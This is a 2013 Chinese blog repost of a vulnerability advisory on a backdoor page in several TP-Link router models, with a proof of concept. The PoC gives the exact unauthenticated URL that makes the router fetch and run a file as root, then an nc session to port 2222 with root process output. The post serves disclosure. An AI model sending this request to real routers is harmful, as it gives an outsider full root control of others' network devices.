[POC]TP-Link路由器存在漏洞

2013-3-17 王健宇 转载

近日,国内漏洞平台乌云爆出了一个TP-LINK路由器的漏洞,随后国家信息安全漏洞共享平台CNVD收录该后门漏洞(收录编号:CNVD-2013-20783)。利用漏洞,攻击者可以完全控制路由器,对用户构成较为严重的威胁。具体情况通报如下:

TP-LINK部分型号的路由器存在某个无需授权认证的特定功能页面(start_art.html),攻击者访问页面之后可引导路由器自动从攻击者控制的TFTP服务器下载恶意程序并以root权限执行。攻击者利用这个漏洞可以在路由器上以root身份执行任意命令,从而可完全控制路由器。目前已知受影响的路由器型号包括: TL-WDR4300、TL-WR743ND (v1.2 v2.0)、TL-WR941N。 其他型号也可能受到影响。这些产品主要应用于企业或家庭局域网的组建。

测试固件为最新的 (发布于2012年12月25日)

 
点击查看原图

POC:

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

    [ <=>                                   ] 426         --.-K/s   in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
  PID  Uid     VmSize Stat Command
    1 root        404 S   init
    2 root            SW< [kthreadd]
    3 root            SW< [ksoftirqd/0]
    4 root            SW< [events/0]
    5 root            SW< [khelper]
    6 root            SW< [async/mgr]
    7 root            SW< [kblockd/0]
    8 root            SW  [pdflush]
    9 root            SW  [pdflush]
   10 root            SW< [kswapd0]
   17 root            SW< [mtdblockd]
   18 root            SW< [unlzma/0]
   71 root       2768 S   /usr/bin/httpd
   76 root        380 S   /sbin/getty ttyS0 115200
   78 root        208 S   ipcserver
   82 root       2768 S   /usr/bin/httpd
   83 root       2768 S   /usr/bin/httpd
   86 root        732 S   ushare -d -x -f /tmp/ushare.conf
   92 root        348 S   syslogd -C -l 7
   96 root        292 S   klogd
  101 root            SW< [napt_ct_scan]
  246 root        348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  247 root        204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  251 root        364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
  286 root       2768 S   /usr/bin/httpd
  299 root       2768 S   /usr/bin/httpd
  300 root       2768 S   /usr/bin/httpd
  305 root       2768 S   /usr/bin/httpd
  307 root       2768 S   /usr/bin/httpd
  309 root       2768 S   /usr/bin/httpd
  310 root       2768 S   /usr/bin/httpd
  389 root       2768 S   /usr/bin/httpd

 

详细信息:
经过HTTP请求发送如下请求:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html


路由器下载了一个(nart.out)文件,从主机,存在的http请求并执行了root权限:
POC  图

点击查看原图

示例展示 获得了从主机发出的HTTP请求:

点击查看原图

利用Wireshark过滤功能来显示路由器的TFTP流量

点击查看原图

nart.out tftp 请求

受影响的型号:
TL-WDR4300
TL-WR743ND (v1.2 v2.0) 

标签: TP-Link漏洞 TP-Link路由漏洞 TP-Link后门 TP-Link路由后门

评论:

1
2013-03-30 15:41
您好,我从乌云网上看到您的蘑菇街bug分析,我们能聊聊吗
我的qq1641022184
M2nT1ger
2013-04-02 11:54
@1:聊啥?

发表评论:

Powered by emlog sitemap